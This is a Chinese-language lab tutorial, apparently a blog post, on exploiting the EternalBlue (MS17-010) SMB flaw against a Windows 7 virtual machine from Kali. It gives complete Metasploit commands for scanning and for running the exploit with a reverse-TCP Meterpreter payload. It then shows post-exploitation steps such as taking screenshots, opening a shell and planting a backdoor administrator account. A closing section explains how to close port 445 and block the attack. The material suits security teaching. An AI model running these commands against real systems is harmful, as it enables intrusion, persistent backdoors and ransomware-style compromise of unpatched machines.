1.何为永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
2.什么是SMB协议? SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
3. SMB工作原理是什么?
虚拟机:VMware 靶机(rhost):Windows7 (IP:192.168.244.133) 攻击机(lhost):Kali (IP:192.168.244.136) 所需工具:nmap、metasploit(MSF) 【工具均在Kali系统内】
靶机关闭防火墙杀软等一切防御信息 否则nmap扫描不到
防火墙关闭路径 控制面板->系统和安全->Windows 防火墙
查看攻击机与靶机的IP信息 攻击机:终端模拟器->ifconfig 靶机:win->cmd->ipconfig
进行ping通测试 Kali使用CTRL+C快捷键进行终止命令进行
和上面两张图片一样结果的都表示Ping通成功
使用nmap扫描工具对目标机网段进行存活主机扫描以及靶机的445端口是否开放
可以看出目标机存活并且445端口为开放状态
以下命令均在Kali攻击机root终端进行!
开启
service postgresql start
查看是否开启
service postgresql status
此状态表示开启成功
初始化
msfdb init
此状态表示初始化成功
Kali root终端输入
msfconsole
此状态表示进入MSF框架成功
db_status #查看是否进入MSF攻击服务 search ms17_010 #查找探测模块 use auxiliary/scanner/smb/smb_ms17_010 #利用探测模块 show options #查看配置参数 set rhost 192.168.244.133/32 #设置探测主机段 set threads 20 #设置探测线程 run/exploit #执行探测
探测出likely表示可能存在漏洞!
use exploit/windows/smb/ms17_010_eternalblue #利用ms17_010永恒之蓝漏洞 set rhost 192.168.244.133 #设置攻击目标IP set payload windows/x64/meterpreter/reverse_tcp #设置攻击载荷(木马信息) set lhost 192.168.244.136 #设置监听主机IP set lpost 445 #设置监听端口 run/exploit #执行攻击
运行成功后会出现meterpreter>
Meterpreter俗称"黑客瑞士军刀"
想要深入了解可以看以下内容 Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功后的攻击载荷使用。它可以在触发漏洞后返回一个由攻击者控制的通道,以便远程执行命令。
Meterpreter的功能丰富,例如添加用户、隐藏某些内容、打开shell、获取用户密码、上传和下载远程主机的文件、运行cmd.exe、捕捉屏幕、获取远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等。此外,Meterpreter可以躲避入侵检测系统,在远程主机上隐藏自己,不改变系统硬盘中的文件,因此HIDS(基于主机的入侵检测系统)很难对它做出响应。
Meterpreter还可以简化任务创建多个会话,利用这些会话进行渗透。在Metasploit Framework中,Meterpreter是一种后渗透工具,它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“内存DLL注入”理念实现的,它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。其中,攻击者与目标设备中Meterpreter的通信是通过Stager套接字实现的。
Meterpreter作为后渗透模块有多种类型,并且命令由核心命令和扩展库命令组成,极大的丰富了攻击方式。此外,Meterpreter还支持Ruby脚本形式的扩展。
sysinfo #查看靶机系统信息 getuid #查看靶机用户身份 screenshot #对靶机当前屏幕进行截图
需要注意的是最后一部屏幕截图保存到了根目录下
根目录下受权限保护可能查看不了图片
解决方法有两种改权限或者复制到桌面上 在这里讲的是第二种方法
cp EoiLSMEC.jpeg '/home/kali/桌面/flag1.png'
shell #进入靶机cmd终端
成功进入靶机C:\Windows\system32路径下
#创建新管理员用户 net user baimao 123 /add #将baimao用户加入到本地管理员组当中 net localgroup administrators baimao /add #查看本地管理员组当中的用户成员 net localgroup administrators #查看此路径下的所有文件和目录 dir
与图片中信息相同就代表后门植入成功
exit可以退回meterpreter路径下
whoami
mkdir baimao
exit可以退出MSF框架
防火墙开启路径 控制面板->系统和安全->Windows 防火墙
查看靶机445端口是否开启
netstat -ant
可以看到445端口是开启状态
禁用靶机445端口路径 控制面板->系统和安全->Windows 防火墙
win+r 运行 输入services.msc
关闭服务路径 控制面板->系统和安全->Windows 防火墙
根据需要可以选择关闭与否
win+r 运行 输入regedit进入注册表
找到此注册表路径 根据自己系统位数进行修改64位就选择QWORD HKEY_LOCAL_MACHINE\System\Controlset\Services\NetBT\Parameters
重命名为SMBDeviceEnabled
右键->修改->数值数据的值为0(0代表关闭,1代表打开),点击确定,完成设置 。
重启之后查看445端口是否关闭!
可以看到445端口已经不见了!
360安全卫士与火绒安全软件成功阻止了永恒之蓝!
大家想要了解的,可以参考下! 360安全卫士和火绒安全软件都是知名的电脑安全软件,具有多种防护功能。 360安全卫士是一款全面而高效的电脑安全防护软件,它拥有强大的查杀能力,可以检测和清除电脑中的病毒、木马、恶意程序等安全隐患。同时,它还提供了多种实用的功能,如实时监控、木马查杀、漏洞修复等,可以帮助用户保护电脑安全,提高使用体验。 火绒安全软件则是一款以防护为主打功能的电脑安全软件,它拥有自主知识产权的新一代反病毒引擎,能够检测和分析恶意程序,提供全面的防护功能。此外,火绒安全软件还拥有钩子扫描功能,可以快速扫描指定进程,发现潜在的安全风险。
2017年永恒之蓝漏洞,编号为ms17_010漏洞。 现在只有一些低版本的电脑没有打ms17_010的补丁,windows7 以上版本几乎都没有这个漏洞了。 虽然如此,此漏洞非常经典,现如今仍有很大的学习漏洞原理以及深入研究防御策略都有很大的借鉴和学习研究的意义。 让大家可以对网络安全更加重视,网络安全刻不容缓,让我们为国家网络安全的建设共同努力!